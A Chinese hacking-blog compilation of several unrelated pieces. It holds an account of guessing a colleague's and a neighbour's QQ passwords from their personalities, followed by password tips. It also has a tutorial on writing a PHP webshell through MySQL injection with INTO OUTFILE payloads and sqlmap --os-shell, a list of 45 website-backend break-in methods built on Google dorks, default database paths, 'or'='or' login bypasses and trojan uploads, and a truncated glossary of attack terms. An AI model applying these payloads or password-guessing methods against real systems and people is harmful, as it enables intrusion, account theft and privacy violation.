最后就是组合了,小数点很有可能会采用下划线或者p(point)代替,首选3.1415926,这其实是一个无限循环的数字,而无限的符号我们知道,是 一个横着写的8,对于高度注重对称美的数学爱好者来说,很可能会在数字和无限之间进行一下区分,于是,我首先想到的两个密码是3_1415926_8还有 3p1415926_8,用其邮箱进行验证,结果均失败,数一下长度,只有11位,而且第一个还没有字母,而前面说过,通常使用下划线的人密码保护意识是 很强的,通常使用了下划线,那么,其密码很可能包括数字和字母——字母嘛,首先想到的当然是他的名字缩写,为了不透露他的个人隐私,假设他叫张三好了。最 后,当我破解了他的密码的时候,我差点兴奋得跳了起来,足足高兴了几天,连睡觉都合不拢嘴!女朋友很好奇问我为什么这么高兴,我一直都是笑而不语!
最终结果:
密码:zs_3_1415926_8
从密码逆推此君的性格:
此人对自我要求很高,有强烈完美主义倾向——从使用圆周率作为密码并且密码体现高度对称美可以看得出来;其次,此人自信但不自负,如果非常自负,那么,他完 全没有必要在在最前面使用自己的姓名,因为通常来说很少有人会想到用圆周率这种意象物作为自己的密码,自负的人会认为使用圆周率已经足够;这种人通常胸怀 宽广,能接受别人的意见或者建议,经常会反躬自省自己的错误并予以改正,生活中,他会是一个良师益友,工作上,他会是给力的伙伴,既可深交也可共事。但 是,其缺点是做事一旦关乎自己,有时候会过于追求完美,从其密码所使用的下划线高度体现对称可以看得出来,这种人打工迟早会成为一个优秀的项目管理人或高 层经理,但是,开拓自己的事业却不容易打破常规。
不管怎样,在工作过程中我一直与此君相处得很好,从来没有红过脸,对我这个脾气暴躁的人来说这是甚为难得的,很大一部分原因我想是源于我对他发自内心的尊重,甚至当我知道了他的密码以后,一直以来还带着深深的负罪感和愧疚感,因而都很少联系他了!

三、破解某邻居的QQ密码

对象个人信息:85后,男性,每天都见面,每次见面时都会彼此很客气地打招呼,聊过几次天;聊天过程其发音非常清楚,说话偶尔会骂两句,说话简洁,非常富有条理性,极少包含“那个”,“然后”这种潮汕人俗称“话屎”的词语;他对社会上的一些现象非常强烈的反感;眼神清澈,给人的感觉非常阳光,健康;有时爱与我聊中国古文化,西方启蒙时期的哲学与思想,并且一聊起来双眼发光,极其兴奋。
破解过程:
首先,聊天时知道了他的出生年份1987年,同时还知道了他的名字,假设为“李四”,还知道他出身于农村。
其次,眼神清澈,而且一见面就愿意向你敞开心扉讲心里话的人通常涉世未深,通常缺少防范意识,这类人的密码保护意识通常也比较差,猜测其密码有可能是姓名加上出生年月日的组合。
再次,说话条理清晰,不带任何“话屎”,而且喜欢聊哲学,这让我想起我的很多射手座朋友,以次推断他可能属于射手座。
再次,射手座生于每年的11月23日——12月21日,尝试用他的名字拼命lisi加上19871201这样的组合进行测试,尝试大约三十次全部失败。
突然,我想得他来自农村,父母在80年代那个时候,极有可能仍在使用农历,因此,注册他身份证的时候,很有可能跟我一样采用农历,上网用万年历查下 1987年阳历11月23日——12月21日这段时期所对应的农历日期,对应的农历时间段是10月初三至11月初一。
最终结果:
密码:lisi_19871011
从密码逆推此君的性格:
此君懂得使用下划线,说明他还有一定的密码保护意识,但是,从其使用自己姓名加上生日这一点可以判断他社会经验缺乏,应该较少与社会上的人接触,应该是宅男 一类的人,工作不可能是销售类和管理类,很有可能是技术类。这种人通常比较爱交朋友,也非常值得交往,是那种你有万贯家财,到了重要的时候都可以放心托付 给他一类的人。后来与他进一步的交往中一步步印证了我的论断。

第七部分:个人密码加密建议

需要使用密码的场合通常是银行的账号,其他的绝大多数则通常是上网的各种邮箱、某些客户端软件、或者论坛的登录密码。绝大多数人上网时候都会使用一个固定的 密码,而且基本上没有修改密码的习惯,因此,只要你在某个论坛的密码一旦泄露,那么,很可能你的所有邮箱、游戏账号等密码都会被人家一锅端。
存在这种现象其实很容易理解,就是因为人的惰性,而且现在的网站那么多,如果针对各个网站去设置不同的密码,对于很多人来说,几乎是不可能完成的任务,因为这样你不仅需要记忆几十个甚至上百个密码,还必须记忆各个密码与各个网站的对应关系。
其实,有一种办法可以保证你的密码可以随着不同网站而进行变换,同时又不需要记忆对应关系的。以下就以这种方法作为切入点,对大家的密码设置提供一些建议,这种办法我们不妨命名为“随机有据字符加固定序列密码”。

一、随机有据字符加固定序列密码

这个名词拥有三个关键词——随机、有据、固定。先说“固定”,固定就是指你经常使用的密码,在你每个密码中都会出现的一个字符段,假如你已经用惯了某个密 码,并且这个密码你把他用在绝大多数的地方,那么,就以这个密码作为固定序列,放在你新密码之中;所谓“随机”,指的是你设置的时候事先并不知道要设置什 么样的字符,而是根据不同的网站或客户端进行变动,但是,其变动是有规则的,这个规则是你自己定的,而且不会让任何人知道;所谓“有据”,这个根据,则与 网站的某一种要素挂钩,我推荐使用网站的名字,目的是方便你自己的记忆。以下我举个例子,你就会很清楚地理解这种所谓的“随机有据字符加固定序列密码”的 特点了。
假如你以往所常用的密码是qwert123,那么,在你的新密码中,同样保留这个字段,现在你自己定义这样一种规则:以网站的名称作为依据,登录任何一个 网站,就以其名称作为参照物,截取其名称的第一个字母(或数字)和最后一个字母(数字),分别放在固定密码段的开头和结尾。例如:上新浪网,其名称为 sina,那么,分别截取s和a,添加在你的固定密码组开头和结尾,那么,你在新浪上的密码就是sawrt123a;如果是迅雷的客户端,取其网站名 Thunder的首字母t和最后一个字母r,这样你的迅雷地址就变成了tawrt123r,由于多了这样一层保护,那么,即使你的新浪微博密码丢失了,那 么,别人也不容易用这个密码来盗取你的迅雷账号、qq号码,而且由于这种密码命名规则简单,你完全可以照用你原来的密码段,不用去修改密码输入的习惯。
上述的命名规则完全由你自己来定,除了那种截取头尾的规则以外,还可以这样:截取网站名的首个字母或数字,同时数一下这个网站名的位数,如果是奇数,字母 取大写;如果是偶数,字母取小写,将它加到你固定密码组的开头或者结尾;如果截取到的是数字,那么,同样数一下网站名的位数,如果是奇数,那么保留这样一 个位数,如果是偶数,则将其双写,加到你的固定密码序列上。示例:sina,baidu,163和2144,sina包含4个字母,所以截取第一个字母的 小写s;baidu是5个字母,于是截取其第一个字母的大写B;163是3个字符,于是取其第一个数字1,2144是4个字符,于是取其第一个数字的复写 22,添加到你的固定密码组上,于是,你的新浪密码是sqwert123,百度密码则变成了Bqwert123,网易邮箱变成了 1qwert123,2144网站的密码则变成了22qwert123。
总之,怎么组合就看你自己考虑了,但随机段截取的规则一定要清晰可行,并且自己要牢记,而且随机字段包含的信息越少越好,太多未必能保护自己的密码,相反更容易让有心人发现规律。

二、关于固定字符段的建议

坚决不使用自己证件上所能查看到的信息,包括生日、证件号码、姓名及其缩写等等,同样也坚决不使用爱人和孩子的同类相关信息。更不要使用无脑型密码。
可以使用电话号码,但是电话号码尽量使用老家的电话号码,并且对该电话号码添加或者减少一至两位的防盗码。
可以使用爱人的昵称,但这个昵称最好是只有你和对方彼此知道的,尤其是互相吹枕头风的时候才使用的那种称谓。
对于银行卡密码,如果你非要向爱人表达爱意,也可以使用你们的结婚纪念日或者其生日,但是一定进行诸如倒序、移位、加码等相关操作。例如:你们的结婚纪念 日是2012年7月5日,你非要使用201275或者120775这样的数字,用倒序的观点,就成了572102和577021,;用移位的观点,不妨设 置成720125或者071275;用加码的观点,可以是只加一位,变成201276和120776,也可以每位加1,312386,231886,什么 规则由你自己选择,关键是你自己要容易记住,而别人又难以看懂。不要小看这种简单的操作,它很可能就是防止你密码泄露的关键。
不需要考虑对称美,密码又不是让人看的,相反是见不得光的,见不得光的对称只能是孤芳自赏,因而,建议你采用下划线或者数字的时候,将其打乱之后插入字母中,最好其结构是一旦写出来会让人看着很别扭的那种——看着越别扭的密码越是好密码,相信我没错的!
强烈建议使用图腾,因为那是你内心深处的东西,有时候即使是你最亲密的人都未必真正了解你内心深处在想什么,陌生人更加难以猜测。
某些字母和数字之间由于形很相似,因而,当你需要使用数字时,不妨用字母进行一下伪装,反之亦然。包括1和l,2和z,6和b,8和B,9和q,0和o。
没有必要定期修改你的固定字符段,那个意义不大,相反很可能会很容易就把自己弄晕,当然前提是你能做到上述提到的那些密码规则。

三、关于安全问题的建议

现在有很多网站尤其是论坛,为了所谓的安全性考虑,用户注册时通常会要求设置安全问题,以我自己的经验来看,那几乎是毫无作用的,这些安全问题通常会让你从 8个左右的问题选择一个进行回答,很多人为了简单易记,通常会选择生日,这本来是没有什么问题的,问题在于电脑是没有智能的,它没有所谓的时间概念,相 反,却有严格的格式概念,例如:某人生日是1980年1月1日,对于人来说,当某人问起你生日的时候,无论你是回答1980年1月1日,还是80年元旦, 亦或是800101,都是一个概念,这个概念指向同一个目标,这个目标就是时间。然而对电脑来说,这几个却是完全不同的概念,对于电脑来说 19800101与8011有着极大的差别,因而,有可能一些不同网站问你的是同一个问题,但是你在回答的时候却使用了不同的格式,这样注册多了,最后很 可能连你自己都搞混了,有时候甚至会导致你自己连密码都修改不了。
因而,我的习惯是除非网站指定安全问题为必填,否则我一律不填,如果填的话,我会随便选择一个问题,并且任何网站的任何安全问题,我都使用同一个标准格式,以前我使用的是“关你鸟事啊”,电脑问我你小学上那所学校啊?你爱人叫什么名字?我都一律回答“关你鸟事啊”——本来我怎样就不关你电脑你的事,还不 是“关你鸟事”吗?!

MySQL注入两种写入一句话快速拿Webshell的方法

利用需要满足以下条件:

  1. root权限
  2. GPC关闭(能使用单引号)
  3. 有绝对路径(读文件可以不用,写文件必须)
  4. 没有配置–secure-file-priv

1.union

</div>
<div class="crayon-main" style="margin:0px;padding:0px;list-style:none;">
    <table class="crayon-table" style="border-spacing:0px;border:1px solid #DDDDDD;text-align:center;">
        <tbody>
            <tr class="crayon-row">
                <td class="crayon-nums " data-settings="show" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">
                    <div class="crayon-nums-content" style="margin:0px;padding:0px;list-style:none;">
                        <div class="crayon-num" data-line="crayon-59a43f023b0b0450187454-1" style="margin:0px;padding:0px;list-style:none;">
                            1
                        </div>
                    </div>
                </td>
                <td class="crayon-code" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">
                    <div class="crayon-pre" style="margin:0px;padding:0px;list-style:none;">
                        <div id="crayon-59a43f023b0b0450187454-1" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-i">id</span><span class="crayon-o">=</span><span class="crayon-cn">2</span><span class="crayon-sy">)</span> <span class="crayon-e">union </span><span class="crayon-i">select</span> <span class="crayon-cn">1</span><span class="crayon-sy">,</span><span class="crayon-cn">2</span><span class="crayon-sy">,</span><span class="crayon-cn">3</span><span class="crayon-sy">,</span><span class="crayon-cn">4</span><span class="crayon-sy">,</span><span class="crayon-cn">5</span><span class="crayon-sy">,</span><span class="crayon-cn">6</span><span class="crayon-sy">,</span><span class="crayon-cn">7</span><span class="crayon-sy">,</span>'<span class="crayon-ta"><?</span> <span class="crayon-e">phpinfo</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span> <span class="crayon-ta">?></span>’ <span class="crayon-e">into </span><span class="crayon-i">outfile</span> ‘<span class="crayon-o">/</span><span class="crayon-i">home</span><span class="crayon-o">/</span><span class="crayon-i">wwwroot</span><span class="crayon-o">/</span><span class="crayon-i">lu4n</span><span class="crayon-sy">.</span><span class="crayon-i">com</span><span class="crayon-o">/</span><span class="crayon-i">luan_phpinfo</span><span class="crayon-sy">.</span><span class="crayon-i">php</span>’<span class="crayon-o">%</span><span class="crayon-cn">23</span>
                        </div>
                    </div>
                </td>
            </tr>
        </tbody>
    </table>
</div>

<? phpinfo(); ?>为写入的内容可添加自己的一句话 /home/wwwroot/5ime.cn/luan_phpinfo.php 为已存在的网站目录下的文件即插入文件名

2.no union

</div>
<div class="crayon-main" style="margin:0px;padding:0px;list-style:none;">
    <table class="crayon-table" style="border-spacing:0px;border:1px solid #DDDDDD;text-align:center;">
        <tbody>
            <tr class="crayon-row">
                <td class="crayon-nums " data-settings="show" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">
                    <div class="crayon-nums-content" style="margin:0px;padding:0px;list-style:none;">
                        <div class="crayon-num" data-line="crayon-59a43f023b0b8247295740-1" style="margin:0px;padding:0px;list-style:none;">
                            1
                        </div>
                    </div>
                </td>
                <td class="crayon-code" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">
                    <div class="crayon-pre" style="margin:0px;padding:0px;list-style:none;">
                        <div id="crayon-59a43f023b0b8247295740-1" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-i">id</span><span class="crayon-o">=</span><span class="crayon-cn">2</span><span class="crayon-sy">)</span> <span class="crayon-e">into </span><span class="crayon-i">outfile</span> ‘<span class="crayon-o">/</span><span class="crayon-i">home</span><span class="crayon-o">/</span><span class="crayon-i">wwwroot</span><span class="crayon-o">/</span><span class="crayon-i">lu4n</span><span class="crayon-sy">.</span><span class="crayon-i">com</span><span class="crayon-o">/</span><span class="crayon-i">luan_phpinfo</span><span class="crayon-sy">.</span><span class="crayon-i">php</span>’ <span class="crayon-e">fields</span> <span class="crayon-e">terminated</span> <span class="crayon-e">by</span> ‘<span class="crayon-ta"><?</span> <span class="crayon-e">phpinfo</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span> <span class="crayon-ta">?></span>’<span class="crayon-o">%</span><span class="crayon-cn">23</span>
                        </div>
                    </div>
                </td>
            </tr>
        </tbody>
    </table>
</div>

第二种方法最早最早是在吐司的一个 2015-1-24 的帖子里看到的,吐司果然大牛多。 效果如下: 这里用的第二种方法是通过插入分隔符号来getshell的,所以必须查询结果有多个列 一般情况下的注入点都是符合条件的。

sqlmap利用方法

以luan_test.php为例:

</div>
<div class="crayon-main" style="margin:0px;padding:0px;list-style:none;">
    <table class="crayon-table" style="border-spacing:0px;border:1px solid #DDDDDD;text-align:center;">
        <tbody>
            <tr class="crayon-row">
                <td class="crayon-nums " data-settings="show" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">
                    <div class="crayon-nums-content" style="margin:0px;padding:0px;list-style:none;">
                        <div class="crayon-num" data-line="crayon-59a43f023b0bc142086430-1" style="margin:0px;padding:0px;list-style:none;">
                            1
                        </div>
                        <div class="crayon-num crayon-striped-num" data-line="crayon-59a43f023b0bc142086430-2" style="margin:0px;padding:0px;list-style:none;">
                            2
                        </div>
                        <div class="crayon-num" data-line="crayon-59a43f023b0bc142086430-3" style="margin:0px;padding:0px;list-style:none;">
                            3
                        </div>
                        <div class="crayon-num crayon-striped-num" data-line="crayon-59a43f023b0bc142086430-4" style="margin:0px;padding:0px;list-style:none;">
                            4
                        </div>
                        <div class="crayon-num" data-line="crayon-59a43f023b0bc142086430-5" style="margin:0px;padding:0px;list-style:none;">
                            5
                        </div>
                        <div class="crayon-num crayon-striped-num" data-line="crayon-59a43f023b0bc142086430-6" style="margin:0px;padding:0px;list-style:none;">
                            6
                        </div>
                        <div class="crayon-num" data-line="crayon-59a43f023b0bc142086430-7" style="margin:0px;padding:0px;list-style:none;">
                            7
                        </div>
                        <div class="crayon-num crayon-striped-num" data-line="crayon-59a43f023b0bc142086430-8" style="margin:0px;padding:0px;list-style:none;">
                            8
                        </div>
                        <div class="crayon-num" data-line="crayon-59a43f023b0bc142086430-9" style="margin:0px;padding:0px;list-style:none;">
                            9
                        </div>
                        <div class="crayon-num crayon-striped-num" data-line="crayon-59a43f023b0bc142086430-10" style="margin:0px;padding:0px;list-style:none;">
                            10
                        </div>
                        <div class="crayon-num" data-line="crayon-59a43f023b0bc142086430-11" style="margin:0px;padding:0px;list-style:none;">
                            11
                        </div>
                    </div>
                </td>
                <td class="crayon-code" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">
                    <div class="crayon-pre" style="margin:0px;padding:0px;list-style:none;">
                        <div id="crayon-59a43f023b0bc142086430-1" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-ta"><?php</span>
                        </div>
                        <div id="crayon-59a43f023b0bc142086430-2" class="crayon-line crayon-striped-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-sy">@</span><span class="crayon-v">$link</span><span class="crayon-o">=</span> <span class="crayon-e">mysql_connect</span><span class="crayon-sy">(</span><span class="crayon-s">"localhost"</span><span class="crayon-sy">,</span><span class="crayon-s">"root"</span><span class="crayon-sy">,</span><span class="crayon-s">""</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span>
                        </div>
                        <div id="crayon-59a43f023b0bc142086430-3" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-e">mysql_select_db</span><span class="crayon-sy">(</span><span class="crayon-s">"mysql"</span><span class="crayon-sy">,</span><span class="crayon-v">$link</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span>
                        </div>
                        <div id="crayon-59a43f023b0bc142086430-4" class="crayon-line crayon-striped-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-v">$user</span> <span class="crayon-o">=</span> <span class="crayon-e">strtolower</span><span class="crayon-sy">(</span><span class="crayon-v">$_GET</span><span class="crayon-sy">[</span><span class="crayon-s">'user'</span><span class="crayon-sy">]</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span>
                        </div>
                        <div id="crayon-59a43f023b0bc142086430-5" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-st">if</span><span class="crayon-sy">(</span><span class="crayon-e">strpos</span><span class="crayon-sy">(</span><span class="crayon-v">$user</span><span class="crayon-sy">,</span><span class="crayon-s">"union"</span><span class="crayon-sy">)</span> <span class="crayon-o">===</span> <span class="crayon-t">false</span><span class="crayon-sy">)</span><span class="crayon-sy">{</span>
                        </div>
                        <div id="crayon-59a43f023b0bc142086430-6" class="crayon-line crayon-striped-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-v">$sql</span><span class="crayon-o">=</span> <span class="crayon-s">"SELECT * FROM user where user='{$user}'"</span><span class="crayon-sy">;</span>
                        </div>
                        <div id="crayon-59a43f023b0bc142086430-7" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-k ">echo</span> <span class="crayon-v">$sql</span> <span class="crayon-sy">.</span> <span class="crayon-s">'<br>'</span><span class="crayon-sy">;</span>
                        </div>
                        <div id="crayon-59a43f023b0bc142086430-8" class="crayon-line crayon-striped-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-e">mysql_query</span><span class="crayon-sy">(</span><span class="crayon-v">$sql</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span>
                        </div>
                        <div id="crayon-59a43f023b0bc142086430-9" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-k ">echo</span> <span class="crayon-e">mysql_errno</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span> <span class="crayon-sy">.</span> <span class="crayon-s">": "</span> <span class="crayon-sy">.</span> <span class="crayon-e">mysql_error</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-sy">.</span> <span class="crayon-s">" "</span><span class="crayon-sy">;</span>
                        </div>
                        <div id="crayon-59a43f023b0bc142086430-10" class="crayon-line crayon-striped-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-sy">}</span>
                        </div>
                        <div id="crayon-59a43f023b0bc142086430-11" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-ta">?></span>
                        </div>
                    </div>
                </td>
            </tr>
        </tbody>
    </table>
</div>

经测试,sqlmap最新版实际是支持这个方法的:

</div>
<div class="crayon-main" style="margin:0px;padding:0px;list-style:none;">
    <table class="crayon-table" style="border-spacing:0px;border:1px solid #DDDDDD;text-align:center;">
        <tbody>
            <tr class="crayon-row">
                <td class="crayon-nums " data-settings="show" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">
                    <div class="crayon-nums-content" style="margin:0px;padding:0px;list-style:none;">
                        <div class="crayon-num" data-line="crayon-59a43f023b0be210058938-1" style="margin:0px;padding:0px;list-style:none;">
                            1
                        </div>
                    </div>
                </td>
                <td class="crayon-code" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">
                    <div class="crayon-pre" style="margin:0px;padding:0px;list-style:none;">
                        <div id="crayon-59a43f023b0be210058938-1" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">
                            <span class="crayon-v">C</span><span class="crayon-o">:</span><span class="crayon-sy">\</span><span class="crayon-v">luan</span><span class="crayon-sy">\</span><span class="crayon-v">sqlmap</span><span class="crayon-o">></span><span class="crayon-e">python </span><span class="crayon-v">sqlmap</span><span class="crayon-e">.py</span> <span class="crayon-o">-</span><span class="crayon-i">u</span> “<span class="crayon-v">http</span><span class="crayon-o">:</span><span class="crayon-o">/</span><span class="crayon-o">/</span><span class="crayon-cn">192.168.2.200</span><span class="crayon-o">/</span><span class="crayon-v">luan_test</span><span class="crayon-e">.php</span><span class="crayon-sy">?</span><span class="crayon-v">user</span><span class="crayon-o">=</span><span class="crayon-i">root</span>” –<span class="crayon-v">os</span><span class="crayon-o">-</span><span class="crayon-v">shell</span>
                        </div>
                    </div>
                </td>
            </tr>
        </tbody>
    </table>
</div>

但是,如果–os-shell用不了,sqlmap有个写文件的选项,经测试不成功。。。。 也就是说,sqlmap只能传自己的webshell 如果工具党遇到这种情况,直接使用sqlmap –os-shell然后用sqlmap上传的Webshell来操作就可以了。

45种攻入后台的方法

45种攻入后台的方法(非原创,来自伟大的网络)
1、到Google搜索, site:cq.cn inurl:asp
2、到Google,搜索一些关键字, edit.asp? 韩国肉鸡为多,多数为MSSQL数据库!
3、利用挖掘鸡和一个ASP木马: 文件名是login.asp 路径组是/manage/ 关键词是went.asp 用’or’=’or’来登陆
4、以下这个方法因为太多人做过,所以一些网站管理员对此都有防范之心了,成功率不高: 关键字:“Co Net MIB Ver 1.0网站后台管理系统” 帐号密码为 ‘or’=’or’
5、动感购物系统,呵呵。想到了明小子: inurl:help.asp登陆,如未注册成为会员! upLoad_bm1.asp和upLoad_c1.asp这两个随便选个,一般管理员都忽视了这2漏洞。
6、默认数据库地址blogdata/acblog.asa 关键字:acblog 7、百度 /htdocs 注册里可以直接上传asa文件!
8、/Database/#newasp.mdb 关键词:NewAsp SiteManageSystem Version
9、用挖掘机 关键字:Powered by WEBBOY 页面:/upfile.asp
10、baidu中搜索关键字Ver5.0 Build 0519 (存在上传漏洞)
11、Upfile_Article.asp bbs/upfile.asp 输入关键字:powered by mypower , 应该是动什么上传漏洞来着?用的人也比较多 估计明小子,挖掘鸡就可以了
12、inurl:winnt\system32\inetsrv\ 在google里面输入这个就可以找到很多网站
13、现在GOOGLE搜索关键字 intitle:网站小助手 inurl:asp
14、关键字: 首页 最新动态 新手指南 舞曲音乐 下载中心 经典文章 玩家风采 装备购买站内流言友情连接 本站论坛 挖掘鸡的关键字 添 setup.asp
15、VBulletin论坛的数据库 默认数据库地址! /includes/functions.php 工具: - 网站猎手。下载地址:百度 Google! - Google 关键字: Powered by: vBulletin Version 3.0.1 Powered by: vBulletin Version 3.0.2 Powered by: vBulletin Version 3.0.3 其中一个就可以了
16
1)打开百度或GOOGLE搜索,输入powered by comersus ASP shopping cart open source。 这是一个商场系统。
2)网站的最底部分,有个 Comersus Open Technologies LC。打开看下comersus系统猜到,comersus.mdb. 是数据库名 数据库都是放在database/ 后的, 所以database/comersus.mdb comersus_listCategoriesTree.asp换成database/comersus.mdb,不能下载。 那样把前一个’’store/”除去,再加上database/comersus.mdb 试试 都是默认数据库地址
17、无忧传奇官方站点程序。
1)后台管理地址:http://您的域名/msmiradmin/ 或者是 http://您的域名/admin.asp
2)默认后台管理帐号:msmir
3)默认后台管理密码:msmirmsmir 或 msmir 数据库文件为 http://您的域名/msmirdata/msmirArticle.mdb 或者是 http://您的域名/msmirdata/msmirArticle.asa 数据库连接文件为 ***/Conn.asp 也是默认数据库地址。 现在传奇4F好多都是这个。呵呵我刚还没事搞了个呢
18、百度里输入/skins/default/
19、利用挖掘机 关键机:power by Discuz 路径:/wish.php 配合: Discuz!论坛 wish.php远程包含漏洞
20、上传漏洞. 工具 : 当然还是明小子了 网站猎手 或者挖掘鸡了。 关键字powered by mypower 检测的页面或文件插入upfile_photo.asp 这个用的人也N多。。
21、新云漏洞 这个漏洞ACCESS和SQL版通吃。 Google搜索关键字 “关于本站 – 网站帮助 – 广告合作 – 下载声明 – 友情连接 – 网站地图 – 管理登录” 把flash/downfile.asp?url=uploadfile/http://www.cnblogs.com/conn.asp提交到网站根目录。就可以下载conn.asp 以源码,软件等下载站居多。 大家时常碰到数据库如果前面或者中间+了# 可以用#替换就可以下载了 \database#newasp.mdb 如:#xzws.mdb 改成#xzws.mdb 收集的。没试过。。。
22、通吃所有商城+动力上传系统 使用工具:挖掘鸡 v1.1 明小子 商城入侵: 关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线支付或下单后汇款->汇款确认->发货->完成 漏洞页面:upload.asp upfile_flash.asp 还是上传漏洞拿webshell
23、注射漏洞 百度搜索ioj’s blog
24、动易 列目录 admin_articlerecyclebin.asp inurl:admin_articlerecyclebin.asp
25、 工具:网站猎手 关键词:inurl:Went.asp 后缀:manage/login.asp 口令:’or’=’or’ 这软件还不是太熟悉。
26、 入侵魔兽私服 需要的工具:ASP木马 – -!废话了。 明小子 关键字:All Right Reserved Design:游戏联盟 后台地址:admin/login.asp 数据库的地址:chngame/#chngame.mdb 都默认的。数据库闹下来自己解密吧不多说了。
27、 漏洞是利用管理员iis设置的失误 用baidu 关键字就是比较罕见的脚本名 动网: ReloadForumCache.asp Leadbbs: makealltopanc.asp BBSXP: admin_fso.asp 动易: admin_articlerecyclebin.asp 好像比较少吧不太清楚了这个。。
28、 国外站的爆库漏洞 关键字:sad Raven’s Guestbook 密码地址:/passwd.dat 后台地址:/admin.php
29、 Discuz 4.1.0跨站漏洞
利用工具:1)WAP浏览器 2)WAP编码转换器 关键字:”intextiscuz! 4.1.0″ WAP浏览器…
30、 关键字:尚奈克斯 后台路径/system/manage.asp 直接传ASP木马 挖掘机去。
31、 工具 1:网站猎手 2:大马 关键字:切勿关闭Cookies功能,否则您将不能登录 插入diy.asp
32、 关键字:Team5 Studio All rights reserved 默认数据库:data/team.mdb 剩下的自己搞。不多说了
33、 工具: 挖掘机 辅臣数据库读取器 关键字: 企业简介 产品展示 产品列表 后缀添加: /database/myszw.mdb 后台地址: admin/Login.asp 都默认的。一样。数据库闹下来自己解密码去 。就行了。
34、 关键子 XXX inurl:Nclass.asp …… 在”系统设置”里写个木马。 会被保存到 在 config.asp内。
35、 不进后台照样拿动网WEBSHELL data.asp?action=BackupData 动网数据库备份默认路径 没试过。。。不知道。
36、 工具:网站猎手 WebShell 关键字:inurl:Went.asp 后缀:manage/login.asp 弱口令:’or’=’or’ 也没试过。 。。。。。。
37、 关键字owered byCDN_NEWS 随便扫遍文章加一个’ ,来试探注入点 后台地址:admin_index.asp 用啥工具我就不说了吧。。。。。。。。。
38、 入侵雷池新闻发布系统 关键字:leichinews 去掉leichinews后面的. 打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp 再上传马….. 进访问uppic anran.asp 登陆马. —- 没试过。汗 ,收集来的。
39、 工具挖掘机就行了。 关键字ower System Of Article Management Ver 3.0 Build 20030628 默认数据库:database\yiuwekdsodksldfslwifds.mdb 后台地址:自己扫描! 工具明小子。怎么又是他啊。 MD5自己解……… (NND这个一扫一大堆。大家可以去试试。。)
40、 一、通过GOOGLE搜索找大量注入点 关键字:asp?id=1 gov.jp/ asp?id= 页数:100 语言:想入侵哪个国家就填什么语言吧
41、 关键字:Powered by:94KKBBS 2005 利用密码找回功能 找回admin 提问:ddddd 回答:ddddd
42、 关键字:inurl:Went.asp 后台为manage/login.asp 后台密码: ‘or’=’ 或者 ‘or”=”or’ 登录 进入 默认数据库地址atabase/DataShop.mdb
43、 关键字:** inurl:readnews.asp 把最后一个/改成\ ,直接暴库,看密码,进后台 随便添加个新闻 在标题输入我们的一句话木马
44、 工具:一句话木马 BBsXp 5.0 sp1 管理员猜解器 关键词:powered by bbsxp5.00 进后台,备份一句话马!
45、 关键字:程序核心:BJXSHOP网上开店专家 后台:/admin

网络安全技术专业术语

**肉鸡:**所谓“肉鸡”是一种很形象的比喻,比喻那些可以随意被我们控制的电脑,对方可以是WINDOWS系统,也可以是UNIX/LINUX系统,可以是普通的个人电脑,也可以是大型的服务器,我们可以象操作自己的电脑那样来操作它们,而不被对方所发觉。**2.木马:**就是那些表面上伪装成了正常的程序,但是当这些被程序运行时,就会获取系统的整个控制权限。有很多黑客就是热中与使用木马程序来控制别人的电脑,比如灰鸽子,黑洞,PcShare等等。**3.网页木马:**表面上伪装成普通的网页文件或是将而已的代码直接插入到正常的网页文件中,当有人访问时,网页木马就会利用对方系统或者浏览器的漏洞自动将配置好的木马的服务端下载到访问者的电脑上来自动执行。**4.挂马:**就是在别人的网站文件里面放入网页木马或者是将代码潜入到对方正常的网页文件里,以使浏览者中马。**5.后门:**这是一种形象的比喻,入侵者在利用某些方法成功的控制了目标主机后,可以在对方的系统中植入特定的程序,或者是修改某些设置。这些改动表面上是很难被察觉的,但是入侵者却可以使用相应的程序或者方法来轻易的与这台电脑建立连接,重新控制这台电脑,就好象是入侵者偷偷的配了一把主人房间的要是,可以随时进出而不被主人发现一样。 通常大多数的特洛伊木马(Trojan 